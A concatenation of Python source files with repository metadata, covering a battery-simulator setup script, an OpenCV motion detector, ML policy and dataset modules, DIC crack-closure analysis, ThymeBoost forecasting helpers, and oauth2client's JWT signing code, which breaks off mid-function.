ba2e93faeed3004d344a8c14f37a409da572271d
|
[
"MIT"
] | 174
|
2018-05-11T13:00:10.000Z
|
2021-11-15T17:47:29.000Z
|
setup.py
|
macklenc/mtnlion
|
ba2e93faeed3004d344a8c14f37a409da572271d
|
[
"MIT"
] | 1
|
2018-05-13T11:11:15.000Z
|
2018-05-13T11:11:15.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""The setup script."""
from setuptools import find_packages, setup
with open("README.rst") as readme_file:
readme = readme_file.read()
with open("HISTORY.rst") as history_file:
history = history_file.read()
requirements = ["Click>=6.0", "numpy", "matplotlib", "munch", "scipy", "xlrd", "sympy"]
setup_requirements = ["pytest-runner"]
test_requirements = ["pytest"]
setup(
author="Christopher Macklen",
author_email="cmacklen@uccs.edu",
classifiers=[
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Programming Language :: Python :: 3.6",
],
description="Mountain Lion Continuum-Scale Lithium-Ion Cell Simulator uses FEniCS to solve partial differential "
"equations for the internal states of Lithium-Ion cells.",
entry_points={"console_scripts": ["mtnlion=mtnlion.cli:main"]},
install_requires=requirements,
license="MIT license",
long_description=readme + "\n\n" + history,
include_package_data=True,
keywords="mtnlion",
name="mtnlion",
packages=find_packages(include=["mtnlion"]),
setup_requires=setup_requirements,
test_suite="tests",
tests_require=test_requirements,
url="https://github.com/macklenc/mtnlion",
version="0.0.1",
zip_safe=False,
)
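# Typical workflow (assumed, not enforced by this file):
#   pip install -e .        # editable install for development
#   python setup.py test    # runs the pytest suite via pytest-runner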
| 30.489362
| 117
| 0.675506
|
7f72cd96a94af2b4db800f5947dbbbfd9634035e
| 71
|
py
|
Python
|
sherry/view/digital/__init__.py
|
py-mu/sherry
|
af1e95f1eada663ba3b3fb607ca88f099f894f36
|
[
"MIT"
] | 1
|
2021-06-27T05:54:23.000Z
|
2021-06-27T05:54:23.000Z
|
sherry/view/digital/__init__.py
|
py-mu/sherry
|
af1e95f1eada663ba3b3fb607ca88f099f894f36
|
[
"MIT"
] | null | null | null |
sherry/view/digital/__init__.py
|
py-mu/sherry
|
af1e95f1eada663ba3b3fb607ca88f099f894f36
|
[
"MIT"
] | 1
|
2021-07-28T09:00:43.000Z
|
2021-07-28T09:00:43.000Z
|
# coding=utf-8
"""
create by pymu
on 2021/8/12
at 20:35
"""
| 11.833333
| 18
| 0.521127
|
2ef293a98bf7b6aa997f0a5080714676031bbf4a
| 1,723
|
py
|
Python
|
modules/push.py
|
ak-oz007/Beyond-Infinity_Abishek-M-K
|
b5e5474a6916edf69a88b4462c5694901b50f4c7
|
[
"Apache-2.0"
] | null | null | null |
modules/push.py
|
ak-oz007/Beyond-Infinity_Abishek-M-K
|
b5e5474a6916edf69a88b4462c5694901b50f4c7
|
[
"Apache-2.0"
] | null | null | null |
modules/push.py
|
ak-oz007/Beyond-Infinity_Abishek-M-K
|
b5e5474a6916edf69a88b4462c5694901b50f4c7
|
[
"Apache-2.0"
] | null | null | null |
import cv2
import numpy as np
def push(cap):
# cap = cv2.VideoCapture('D:\\Downloads\\5_1_5.avi')
frame_width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
frame_height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fourcc = cv2.VideoWriter_fourcc('X', 'V', 'I', 'D')
out = cv2.VideoWriter("output.avi", fourcc, 5.0, (1280, 720))
ret, frame1 = cap.read()
ret, frame2 = cap.read()
# print(frame1.shape)
while cap.isOpened():
diff = cv2.absdiff(frame1, frame2)
gray = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)
blur = cv2.GaussianBlur(gray, (5, 5), 0)
_, thresh = cv2.threshold(blur, 20, 255, cv2.THRESH_BINARY)
dilated = cv2.dilate(thresh, None, iterations=3)
contours, _ = cv2.findContours(dilated, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
for contour in contours:
(x, y, w, h) = cv2.boundingRect(contour)
if cv2.contourArea(contour) < 900:
continue
cv2.rectangle(frame1, (x, y), (x + w, y + h), (0, 255, 0), 2)
cv2.putText(frame1, "walking {}".format('pushing'), (10, 20), cv2.FONT_HERSHEY_SIMPLEX,
1, (0, 0, 255), 3)
# cv2.drawContours(frame1, contours, -1, (0, 255, 0), 2)
return True
cv2.drawContours(frame1, contours, -1, (0, 255, 0), 2)
image = cv2.resize(frame1, (1280, 720))
out.write(image)
cv2.imshow("feed", frame1)
frame1 = frame2
ret, frame2 = cap.read()
if cv2.waitKey(40) == 27:
return False
# break
    cv2.waitKey(1000)
cv2.destroyAllWindows()
# cap.release()
out.release()
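# Minimal usage sketch; the capture source below is an assumption (a video
# file path or a camera index both work with cv2.VideoCapture).
if __name__ == "__main__":
    capture = cv2.VideoCapture(0)  # placeholder source
    print("pushing detected:", push(capture))
    capture.release()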
| 34.46
| 100
| 0.557168
|
fabe536be607b5bb7e09b48ea5c7e45822eec459
| 2,557
|
py
|
Python
|
codes/model/expert_policy/normal_mlp.py
|
shagunsodhani/consistent-dynamics
|
cc1527f2468cdcebea9a57387254278eb5547fe3
|
[
"MIT"
] | 8
|
2019-05-06T13:30:57.000Z
|
2020-05-25T20:32:47.000Z
|
codes/model/expert_policy/normal_mlp.py
|
shagunsodhani/consistent-dynamics
|
cc1527f2468cdcebea9a57387254278eb5547fe3
|
[
"MIT"
] | null | null | null |
codes/model/expert_policy/normal_mlp.py
|
shagunsodhani/consistent-dynamics
|
cc1527f2468cdcebea9a57387254278eb5547fe3
|
[
"MIT"
] | 2
|
2019-05-06T15:11:42.000Z
|
2020-03-06T12:36:16.000Z
|
import os
import numpy as np
import torch
import torch.nn as nn
from torch.distributions import Normal
from codes.model.expert_policy.utils import RunningMeanStd
class NormalMLPPolicy(nn.Module):
def __init__(self, input_size, output_size, hidden_size, num_layers,
nonlinearity=nn.Tanh):
super(NormalMLPPolicy, self).__init__()
self.input_size = input_size
self.output_size = output_size
self.hidden_size = hidden_size
self.num_layers = num_layers
self.nonlinearity = nonlinearity
layers = []
for i in range(num_layers):
input_dim = input_size if i == 0 else hidden_size
layers.append(nn.Linear(input_dim, hidden_size, bias=True))
layers.append(nonlinearity())
self.layers = nn.Sequential(*layers)
self.mean = nn.Linear(hidden_size, output_size, bias=True)
self.logstd = nn.Parameter(torch.zeros(output_size))
self.obs_rms = RunningMeanStd(shape=(input_size,), dtype=torch.float64)
def forward(self, inputs):
normalized_inputs = self.obs_rms(inputs)
normalized_inputs = torch.clamp(normalized_inputs, -5.0, 5.0)
outputs = self.layers(normalized_inputs)
mean = self.mean(outputs)
return Normal(loc=mean, scale=torch.exp(self.logstd))
def load_weights(self, config_dict):
expert_policy_config = config_dict.model.expert_policy
name = '{0}__{1}'.format(config_dict.env.name, expert_policy_config.name)
# Load the Pytorch model
        with open(os.path.join(expert_policy_config.save_dir, '{0}.pt'.format(name)), 'rb') as f:
            self.load_state_dict(torch.load(f))
def sample_action(self, input):
return self.forward(input).mean.detach().numpy()
def get_model_using_config_dict(config_dict):
expert_policy_config = config_dict.model.expert_policy
model = NormalMLPPolicy(input_size=int(np.prod(config_dict.env.observation_space.shape)),
output_size=int(np.prod(config_dict.env.action_space.shape)),
hidden_size=expert_policy_config.hidden_size,
num_layers=expert_policy_config.num_layers,
nonlinearity=nn.Tanh)
name = '{0}__{1}'.format(config_dict.env.name, expert_policy_config.name)
file_name = os.path.join(expert_policy_config.save_dir, '{0}.th.pt'.format(name))
model.load_state_dict(torch.load(file_name))
print("Model loaded successfully.")
return model
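# Minimal usage sketch; the observation is assumed to already be a flat float
# vector of length input_size, matching the environments used above.
def act(policy, observation):
    obs = torch.as_tensor(observation, dtype=torch.float32).unsqueeze(0)
    # sample_action returns the detached mean of the predicted Normal.
    return policy.sample_action(obs)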
| 38.742424
| 97
| 0.67501
|
6c74b95a2f66a0a94c4fa75d909cc1024ffa0b68
| 7,021
|
py
|
Python
|
demos/test_process_dic.py
|
VibroSim/closure_measurements
|
3c5560db85e0e9e276aaccc06c49c63224dbddca
|
[
"MIT"
] | null | null | null |
demos/test_process_dic.py
|
VibroSim/closure_measurements
|
3c5560db85e0e9e276aaccc06c49c63224dbddca
|
[
"MIT"
] | null | null | null |
demos/test_process_dic.py
|
VibroSim/closure_measurements
|
3c5560db85e0e9e276aaccc06c49c63224dbddca
|
[
"MIT"
] | null | null | null |
import sys
import os
import multiprocessing
import numpy as np
from matplotlib import pyplot as pl
from function_as_script import scriptify
from closure_measurements.process_dic import load_dgs
from closure_measurements.process_dic import Calc_CTODs as calc_CTODs_function
from closure_measurements.process_dic import CalcInitialModel as CalcInitialModel_function
from closure_measurements.process_dic import InitializeFullModel as InitializeFullModel_function
from closure_measurements.process_dic import CalcFullModel as CalcFullModel_function
from closure_measurements.process_dic import TestRegistration
import pyopencl as cl
#Calc_CTODs=scriptify(calc_CTODs_function)
#CalcInitialModel=scriptify(CalcInitialModel_function)
#CalcFullModel=scriptify(CalcFullModel_function)
Calc_CTODs=calc_CTODs_function
CalcInitialModel=CalcInitialModel_function
InitializeFullModel=InitializeFullModel_function
CalcFullModel=CalcFullModel_function
# Probably want to run view_dic_input on the same data file
# prior to running this to set TipCoords1 and 2 and XRange.
#
# using view_dic_input you can click on points in the plots
# and it will print out the coordinates in meters,
# suitable for use in
if __name__=="__main__":
#dgsfilename = "/tmp/C18-AFVT-018J_optical_collect_optical_data_dic.dgs"
#dgsfilename = "/tmp/C18-AFVT-011X_optical_collect_optical_data_dic.dgs"
#dgsfilename = "/tmp/0000-C18-AFVT-018J_optical_collect_optical_data_dic.dgs"
dgsfilename = "/tmp/0001-C14-UTCA-013E_optical_collect_optical_data_dic.dgs.bz2"
dic_fullmodel_optimization=True
YoungsModulus=113.8e9 # 113.8 GPa for Ti-6-4
# YoungsModulus=200.0e9 # 200 GPa for In718
    dic_span=20 # formerly step... this is measured in the scaled pixels
dic_smoothing_window=3 # formerly window... This is measured in the scaled pixels
min_dic_points_per_meter=40000
nominal_length=2e-3 # nominal crack length, for nondimensional normalization
if dic_fullmodel_optimization:
nominal_modulus=100.0e9 # nominal modulus
pass
nominal_stress=50e6 # nominal stress
tip_tolerance = 100e-6 # 100 microns
Symmetric_COD=True # assume a symmetric form for the COD -- appropriate when the data is from surface cracks of length 2a where the center is (roughly) a symmetry point
if dic_fullmodel_optimization:
ctx = cl.create_some_context() # set ctx and dev equal to None in order to disable OpenCL acceleration
dev = ctx.devices[0]
print("Using accelerator \"%s\" for fullmodel optimization" % (dev.name))
pass
else:
ctx = None
dev = None
pass
(dic_dx,dic_dy,
dic_nx,dic_ny,
XRangeSize,
nloads,
Xinivec,Xposvecs,
load1,load2,u_disps,v_disps,
ROI_out_arrays,
CrackCenterCoords,TipCoords1,TipCoords2,
ROI_dic_yminidx,ROI_dic_ymaxidx,
relshift_middleimg_lowerleft_corner_x_ref,
relshift_middleimg_lowerleft_corner_x_diff,
relshift_middleimg_lowerleft_corner_y_ref,
relshift_middleimg_lowerleft_corner_y_diff) = load_dgs(dgsfilename)
#print(TipCoords1)
#print(TipCoords1[1])
#print(TipCoords2)
#print(TipCoords2[1])
CTODs = Calc_CTODs(dic_nx,nloads,XRangeSize,Xposvecs,v_disps,ROI_out_arrays,ROI_dic_yminidx,ROI_dic_ymaxidx,dic_span,dic_smoothing_window)
(InitialModels_side1,
InitialCoeffs_side1,
Error_side1,
npoints_side1,
XPositions_side1,
CTODValues_side1) = CalcInitialModel(nloads,CTODs,load1,load2,Xposvecs,CrackCenterCoords,dic_dy,dic_span,Symmetric_COD,1,YoungsModulus,relshift_middleimg_lowerleft_corner_x_ref=relshift_middleimg_lowerleft_corner_x_ref,nominal_length=nominal_length,nominal_stress=nominal_stress,doplots=True)
(InitialModels_side2,
InitialCoeffs_side2,
Error_side2,
npoints_side2,
XPositions_side2,
CTODValues_side2) = CalcInitialModel(nloads,CTODs,load1,load2,Xposvecs,CrackCenterCoords,dic_dy,dic_span,Symmetric_COD,2,YoungsModulus,relshift_middleimg_lowerleft_corner_x_ref=relshift_middleimg_lowerleft_corner_x_ref,nominal_length=nominal_length,nominal_stress=nominal_stress,doplots=True)
(minload_side1,maxload_side1,seed_param_side1,lowest_avg_load_used_side1,fm_plots,fm_plotdata_side1) = InitializeFullModel(load1,load2,TipCoords1,TipCoords2,InitialCoeffs_side1,Error_side1,npoints_side1,XPositions_side1,CTODValues_side1,InitialModels_side1,CrackCenterCoords,tip_tolerance,min_dic_points_per_meter,Symmetric_COD,side=1,doplots=True)
(minload_side2,maxload_side2,seed_param_side2,lowest_avg_load_used_side2,fm_plots,fm_plotdata_side2) = InitializeFullModel(load1,load2,TipCoords1,TipCoords2,InitialCoeffs_side2,Error_side2,npoints_side2,XPositions_side2,CTODValues_side2,InitialModels_side2,CrackCenterCoords,tip_tolerance,min_dic_points_per_meter,Symmetric_COD,side=2,doplots=True)
if dic_fullmodel_optimization:
(full_model_params_side1,full_model_result_side1,full_model_optim_plots_side1) = CalcFullModel(load1,load2,InitialCoeffs_side1,Error_side1,npoints_side1,XPositions_side1,CTODValues_side1,InitialModels_side1,CrackCenterCoords,Symmetric_COD,side=1,minload=minload_side1,maxload=maxload_side1,seed_param=seed_param_side1,nominal_length=nominal_length,nominal_modulus=nominal_modulus,nominal_stress=nominal_stress,doplots=True,fm_plotdata=fm_plotdata_side1,opencl_ctx=ctx,opencl_dev=dev)
(full_model_params_side2,full_model_result_side2,full_model_optim_plots_side2) = CalcFullModel(load1,load2,InitialCoeffs_side2,Error_side2,npoints_side2,XPositions_side2,CTODValues_side2,InitialModels_side2,CrackCenterCoords,Symmetric_COD,side=2,minload=minload_side2,maxload=maxload_side2,seed_param=seed_param_side2,nominal_length=nominal_length,nominal_modulus=nominal_modulus,nominal_stress=nominal_stress,doplots=True,fm_plotdata=fm_plotdata_side2,opencl_ctx=ctx,opencl_dev=dev)
pass
if relshift_middleimg_lowerleft_corner_x_ref is not None:
# Only applies to DIC dgs files generated through dc_process that have additional registration info added!
TestRegistration(nloads,Xposvecs,u_disps,v_disps,
ROI_out_arrays,
relshift_middleimg_lowerleft_corner_x_ref=relshift_middleimg_lowerleft_corner_x_ref,
relshift_middleimg_lowerleft_corner_x_diff=relshift_middleimg_lowerleft_corner_x_diff,
relshift_middleimg_lowerleft_corner_y_ref=relshift_middleimg_lowerleft_corner_y_ref,
relshift_middleimg_lowerleft_corner_y_diff=relshift_middleimg_lowerleft_corner_y_diff)
pass
## Plot diagnostics...
# Should have at least one plot that evaluates
# overall performance in fitting the entire data set.
#
# ... how to collapse it down to 2D?
# (Could add additional lines to the InitialModel plots...)
#pl.figure()
pl.show()
pass
| 45.296774
| 491
| 0.79604
|
8f3d209e6c6c2bf39050c221f1b255356ac48559
| 4,943
|
py
|
Python
|
code/dataloaders/dataset.py
|
tea321000/SSL4MIS
|
8d1b0be08cf089943481a47877b36eb6405fffb2
|
[
"MIT"
] | null | null | null |
code/dataloaders/dataset.py
|
tea321000/SSL4MIS
|
8d1b0be08cf089943481a47877b36eb6405fffb2
|
[
"MIT"
] | null | null | null |
code/dataloaders/dataset.py
|
tea321000/SSL4MIS
|
8d1b0be08cf089943481a47877b36eb6405fffb2
|
[
"MIT"
] | null | null | null |
import os
import cv2
import torch
import random
import numpy as np
from glob import glob
from torch.utils.data import Dataset
import h5py
from scipy.ndimage.interpolation import zoom
import itertools
from scipy import ndimage
from torch.utils.data.sampler import Sampler
class BaseDataSets(Dataset):
def __init__(self, base_dir=None, split='train', num=None, transform=None):
self._base_dir = base_dir
self.sample_list = []
self.split = split
self.transform = transform
if self.split == 'train':
with open(self._base_dir + '/train_slices.list', 'r') as f1:
self.sample_list = f1.readlines()
self.sample_list = [item.replace('\n', '')
for item in self.sample_list]
elif self.split == 'val':
with open(self._base_dir + '/val.list', 'r') as f:
self.sample_list = f.readlines()
self.sample_list = [item.replace('\n', '')
for item in self.sample_list]
if num is not None and self.split == "train":
self.sample_list = self.sample_list[:num]
print("total {} samples".format(len(self.sample_list)))
def __len__(self):
return len(self.sample_list)
def __getitem__(self, idx):
case = self.sample_list[idx]
if self.split == "train":
h5f = h5py.File(self._base_dir +
"/data/slices/{}.h5".format(case), 'r')
else:
h5f = h5py.File(self._base_dir + "/data/{}.h5".format(case), 'r')
image = h5f['image'][:]
label = h5f['label'][:]
sample = {'image': image, 'label': label}
if self.split == "train":
sample = self.transform(sample)
sample["idx"] = idx
return sample
def random_rot_flip(image, label):
k = np.random.randint(0, 4)
image = np.rot90(image, k)
label = np.rot90(label, k)
axis = np.random.randint(0, 2)
image = np.flip(image, axis=axis).copy()
label = np.flip(label, axis=axis).copy()
return image, label
def random_rotate(image, label):
angle = np.random.randint(-20, 20)
image = ndimage.rotate(image, angle, order=0, reshape=False)
label = ndimage.rotate(label, angle, order=0, reshape=False)
return image, label
class RandomGenerator(object):
def __init__(self, output_size):
self.output_size = output_size
def __call__(self, sample):
image, label = sample['image'], sample['label']
# ind = random.randrange(0, img.shape[0])
# image = img[ind, ...]
# label = lab[ind, ...]
if random.random() > 0.5:
image, label = random_rot_flip(image, label)
elif random.random() > 0.5:
image, label = random_rotate(image, label)
x, y = image.shape
image = zoom(
image, (self.output_size[0] / x, self.output_size[1] / y), order=0)
label = zoom(
label, (self.output_size[0] / x, self.output_size[1] / y), order=0)
image = torch.from_numpy(
image.astype(np.float32)).unsqueeze(0)
label = torch.from_numpy(label.astype(np.uint8))
sample = {'image': image, 'label': label}
return sample
class TwoStreamBatchSampler(Sampler):
"""Iterate two sets of indices
An 'epoch' is one iteration through the primary indices.
During the epoch, the secondary indices are iterated through
as many times as needed.
"""
def __init__(self, primary_indices, secondary_indices, batch_size, secondary_batch_size):
self.primary_indices = primary_indices
self.secondary_indices = secondary_indices
self.secondary_batch_size = secondary_batch_size
self.primary_batch_size = batch_size - secondary_batch_size
assert len(self.primary_indices) >= self.primary_batch_size > 0
assert len(self.secondary_indices) >= self.secondary_batch_size > 0
def __iter__(self):
primary_iter = iterate_once(self.primary_indices)
secondary_iter = iterate_eternally(self.secondary_indices)
return (
primary_batch + secondary_batch
for (primary_batch, secondary_batch)
in zip(grouper(primary_iter, self.primary_batch_size),
grouper(secondary_iter, self.secondary_batch_size))
)
def __len__(self):
return len(self.primary_indices) // self.primary_batch_size
def iterate_once(iterable):
return np.random.permutation(iterable)
def iterate_eternally(indices):
def infinite_shuffles():
while True:
yield np.random.permutation(indices)
return itertools.chain.from_iterable(infinite_shuffles())
def grouper(iterable, n):
"Collect data into fixed-length chunks or blocks"
    # grouper('ABCDEFG', 3) --> ABC DEF
args = [iter(iterable)] * n
return zip(*args)
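# Minimal sketch of the usual semi-supervised wiring: labeled indices feed the
# primary stream and unlabeled indices the secondary one. The index split and
# batch sizes below are assumptions, not fixed by this file.
def build_two_stream_loader(dataset, labeled_num, batch_size=8, labeled_bs=4):
    from torch.utils.data import DataLoader
    labeled_idxs = list(range(labeled_num))
    unlabeled_idxs = list(range(labeled_num, len(dataset)))
    batch_sampler = TwoStreamBatchSampler(
        labeled_idxs, unlabeled_idxs, batch_size, batch_size - labeled_bs)
    return DataLoader(dataset, batch_sampler=batch_sampler)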
| 30.89375
| 93
| 0.620676
|
2ee5d43f858504b757d728b4741916e1630ef02e
| 3,840
|
py
|
Python
|
ThymeBoost/predict_functions.py
|
tblume1992/ThymeBoost_old
|
52fe4d8b25d1b2b7b92934010d697735cb7b68b4
|
[
"MIT"
] | null | null | null |
ThymeBoost/predict_functions.py
|
tblume1992/ThymeBoost_old
|
52fe4d8b25d1b2b7b92934010d697735cb7b68b4
|
[
"MIT"
] | null | null | null |
ThymeBoost/predict_functions.py
|
tblume1992/ThymeBoost_old
|
52fe4d8b25d1b2b7b92934010d697735cb7b68b4
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import numpy as np
def predict_trend(booster_obj, boosting_round, forecast_horizon):
"""
Predict the trend component using the booster
Parameters
----------
boosting_round : int
The round to reference when getting model params.
forecast_horizon : int
Number of periods to forecast.
Returns
-------
trend_round : np.array
That boosting round's predicted trend component.
"""
trend_param = booster_obj.trend_pred_params[boosting_round]
trend_model = booster_obj.trend_objs[boosting_round].model_obj
trend_round = trend_model.predict(forecast_horizon, trend_param)
return trend_round
def predict_seasonality(booster_obj, boosting_round, forecast_horizon):
"""
Predict the seasonality component using the booster.
Parameters
----------
boosting_round : int
The round to reference when getting model params.
forecast_horizon : int
Number of periods to forecast.
Returns
-------
seas_round : np.array
That boosting round's predicted seasonal component.
"""
seas_param = booster_obj.seasonal_pred_params[boosting_round]
seas_model = booster_obj.seasonal_objs[boosting_round].model_obj
if seas_model is None:
seas_round = np.zeros(forecast_horizon)
else:
seas_round = seas_model.predict(forecast_horizon, seas_param)
return seas_round
def predict_exogenous(booster_obj,
future_exo,
boosting_round,
forecast_horizon):
"""
Predict the exogenous component using the booster.
Parameters
----------
boosting_round : int
The round to reference when getting model params.
forecast_horizon : int
Number of periods to forecast.
Returns
-------
    exo_round : np.array
        That boosting round's predicted exogenous component.
"""
if future_exo is None:
exo_round = np.zeros(forecast_horizon)
else:
exo_model = booster_obj.exo_objs[boosting_round].model_obj
exo_round = exo_model.predict(future_exo)
return exo_round
def predict_rounds(booster_obj,
forecast_horizon,
future_exo=None):
"""
Predict all the rounds from a booster
Parameters
----------
    booster_obj : object
        The fitted booster holding the per-round component models.
forecast_horizon : int
Number of periods to forecast.
Returns
-------
trend_predictions : np.array
Trend component.
seasonal_predictions : np.array
seasonal component.
predictions : np.array
Predictions.
"""
trend_predictions = np.zeros(forecast_horizon)
seasonal_predictions = np.zeros(forecast_horizon)
exo_predictions = np.zeros(forecast_horizon)
for boosting_round in range(booster_obj.i):
trend_predictions += predict_trend(booster_obj,
boosting_round,
forecast_horizon)
seasonal_predictions += predict_seasonality(booster_obj,
boosting_round,
forecast_horizon)
exo_predictions += predict_exogenous(booster_obj,
future_exo,
boosting_round,
forecast_horizon)
predictions = (trend_predictions +
seasonal_predictions +
exo_predictions)
return trend_predictions, seasonal_predictions, exo_predictions, predictions
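# Minimal sketch of the intended call pattern once a booster has been fit
# elsewhere; the dict keys are illustrative.
def forecast_components(booster_obj, forecast_horizon, future_exo=None):
    trend, seasonality, exogenous, total = predict_rounds(booster_obj,
                                                          forecast_horizon,
                                                          future_exo)
    # The prediction is simply the sum of the boosted components.
    assert np.allclose(total, trend + seasonality + exogenous)
    return {'trend': trend, 'seasonality': seasonality,
            'exogenous': exogenous, 'prediction': total}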
| 31.219512
| 81
| 0.59375
|
d2d7a3bbdf4c4f00402868f74bd7bf8e6a72eb3c
| 10,812
|
py
|
Python
|
oauth2client/crypt.py
|
DUYNT/google-api-python-client
|
37d60a2da6864ebef5bd83daa4da680e06e08db3
|
[
"Apache-2.0"
] | 1
|
2015-05-14T00:06:51.000Z
|
2015-05-14T00:06:51.000Z
|
oauth2client/crypt.py
|
DUYNT/google-api-python-client
|
37d60a2da6864ebef5bd83daa4da680e06e08db3
|
[
"Apache-2.0"
] | 1
|
2016-06-23T16:33:52.000Z
|
2016-06-23T16:33:52.000Z
|
oauth2client/crypt.py
|
DUYNT/google-api-python-client
|
37d60a2da6864ebef5bd83daa4da680e06e08db3
|
[
"Apache-2.0"
] | 1
|
2020-07-24T20:04:47.000Z
|
2020-07-24T20:04:47.000Z
|
#!/usr/bin/python2.4
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import hashlib
import logging
import time
from anyjson import simplejson
CLOCK_SKEW_SECS = 300 # 5 minutes in seconds
AUTH_TOKEN_LIFETIME_SECS = 300 # 5 minutes in seconds
MAX_TOKEN_LIFETIME_SECS = 86400 # 1 day in seconds
logger = logging.getLogger(__name__)
class AppIdentityError(Exception):
pass
try:
from OpenSSL import crypto
class OpenSSLVerifier(object):
"""Verifies the signature on a message."""
def __init__(self, pubkey):
"""Constructor.
Args:
pubkey, OpenSSL.crypto.PKey, The public key to verify with.
"""
self._pubkey = pubkey
def verify(self, message, signature):
"""Verifies a message against a signature.
Args:
message: string, The message to verify.
signature: string, The signature on the message.
Returns:
True if message was signed by the private key associated with the public
key that this object was constructed with.
"""
try:
crypto.verify(self._pubkey, signature, message, 'sha256')
return True
except:
return False
@staticmethod
def from_string(key_pem, is_x509_cert):
"""Construct a Verified instance from a string.
Args:
key_pem: string, public key in PEM format.
is_x509_cert: bool, True if key_pem is an X509 cert, otherwise it is
expected to be an RSA key in PEM format.
Returns:
Verifier instance.
Raises:
OpenSSL.crypto.Error if the key_pem can't be parsed.
"""
if is_x509_cert:
pubkey = crypto.load_certificate(crypto.FILETYPE_PEM, key_pem)
else:
pubkey = crypto.load_privatekey(crypto.FILETYPE_PEM, key_pem)
return OpenSSLVerifier(pubkey)
class OpenSSLSigner(object):
"""Signs messages with a private key."""
def __init__(self, pkey):
"""Constructor.
Args:
pkey, OpenSSL.crypto.PKey (or equiv), The private key to sign with.
"""
self._key = pkey
def sign(self, message):
"""Signs a message.
Args:
message: string, Message to be signed.
Returns:
string, The signature of the message for the given key.
"""
return crypto.sign(self._key, message, 'sha256')
@staticmethod
def from_string(key, password='notasecret'):
"""Construct a Signer instance from a string.
Args:
key: string, private key in PKCS12 or PEM format.
password: string, password for the private key file.
Returns:
Signer instance.
Raises:
OpenSSL.crypto.Error if the key can't be parsed.
"""
parsed_pem_key = _parse_pem_key(key)
if parsed_pem_key:
pkey = crypto.load_privatekey(crypto.FILETYPE_PEM, parsed_pem_key)
else:
pkey = crypto.load_pkcs12(key, password).get_privatekey()
return OpenSSLSigner(pkey)
except ImportError:
OpenSSLVerifier = None
OpenSSLSigner = None
try:
from Crypto.PublicKey import RSA
from Crypto.Hash import SHA256
from Crypto.Signature import PKCS1_v1_5
class PyCryptoVerifier(object):
"""Verifies the signature on a message."""
def __init__(self, pubkey):
"""Constructor.
Args:
pubkey, OpenSSL.crypto.PKey (or equiv), The public key to verify with.
"""
self._pubkey = pubkey
def verify(self, message, signature):
"""Verifies a message against a signature.
Args:
message: string, The message to verify.
signature: string, The signature on the message.
Returns:
True if message was signed by the private key associated with the public
key that this object was constructed with.
"""
try:
return PKCS1_v1_5.new(self._pubkey).verify(
SHA256.new(message), signature)
except:
return False
@staticmethod
def from_string(key_pem, is_x509_cert):
"""Construct a Verified instance from a string.
Args:
key_pem: string, public key in PEM format.
is_x509_cert: bool, True if key_pem is an X509 cert, otherwise it is
expected to be an RSA key in PEM format.
Returns:
Verifier instance.
Raises:
NotImplementedError if is_x509_cert is true.
"""
if is_x509_cert:
raise NotImplementedError(
'X509 certs are not supported by the PyCrypto library. '
'Try using PyOpenSSL if native code is an option.')
else:
pubkey = RSA.importKey(key_pem)
return PyCryptoVerifier(pubkey)
class PyCryptoSigner(object):
"""Signs messages with a private key."""
def __init__(self, pkey):
"""Constructor.
Args:
pkey, OpenSSL.crypto.PKey (or equiv), The private key to sign with.
"""
self._key = pkey
def sign(self, message):
"""Signs a message.
Args:
message: string, Message to be signed.
Returns:
string, The signature of the message for the given key.
"""
return PKCS1_v1_5.new(self._key).sign(SHA256.new(message))
@staticmethod
def from_string(key, password='notasecret'):
"""Construct a Signer instance from a string.
Args:
key: string, private key in PEM format.
password: string, password for private key file. Unused for PEM files.
Returns:
Signer instance.
Raises:
      NotImplementedError if the key isn't in PEM format.
"""
parsed_pem_key = _parse_pem_key(key)
if parsed_pem_key:
pkey = RSA.importKey(parsed_pem_key)
else:
raise NotImplementedError(
          'PKCS12 format is not supported by the PyCrypto library. '
'Try converting to a "PEM" '
'(openssl pkcs12 -in xxxxx.p12 -nodes -nocerts > privatekey.pem) '
'or using PyOpenSSL if native code is an option.')
return PyCryptoSigner(pkey)
except ImportError:
PyCryptoVerifier = None
PyCryptoSigner = None
if OpenSSLSigner:
Signer = OpenSSLSigner
Verifier = OpenSSLVerifier
elif PyCryptoSigner:
Signer = PyCryptoSigner
Verifier = PyCryptoVerifier
else:
raise ImportError('No encryption library found. Please install either '
'PyOpenSSL, or PyCrypto 2.6 or later')
def _parse_pem_key(raw_key_input):
"""Identify and extract PEM keys.
Determines whether the given key is in the format of PEM key, and extracts
the relevant part of the key if it is.
Args:
raw_key_input: The contents of a private key file (either PEM or PKCS12).
Returns:
string, The actual key if the contents are from a PEM file, or else None.
"""
offset = raw_key_input.find('-----BEGIN ')
if offset != -1:
return raw_key_input[offset:]
else:
return None
def _urlsafe_b64encode(raw_bytes):
return base64.urlsafe_b64encode(raw_bytes).rstrip('=')
def _urlsafe_b64decode(b64string):
# Guard against unicode strings, which base64 can't handle.
b64string = b64string.encode('ascii')
padded = b64string + '=' * (4 - len(b64string) % 4)
return base64.urlsafe_b64decode(padded)
def _json_encode(data):
return simplejson.dumps(data, separators = (',', ':'))
def make_signed_jwt(signer, payload):
"""Make a signed JWT.
See http://self-issued.info/docs/draft-jones-json-web-token.html.
Args:
signer: crypt.Signer, Cryptographic signer.
payload: dict, Dictionary of data to convert to JSON and then sign.
Returns:
string, The JWT for the payload.
"""
header = {'typ': 'JWT', 'alg': 'RS256'}
segments = [
_urlsafe_b64encode(_json_encode(header)),
_urlsafe_b64encode(_json_encode(payload)),
]
signing_input = '.'.join(segments)
signature = signer.sign(signing_input)
segments.append(_urlsafe_b64encode(signature))
logger.debug(str(segments))
return '.'.join(segments)
def verify_signed_jwt_with_certs(jwt, certs, audience):
"""Verify a JWT against public certs.
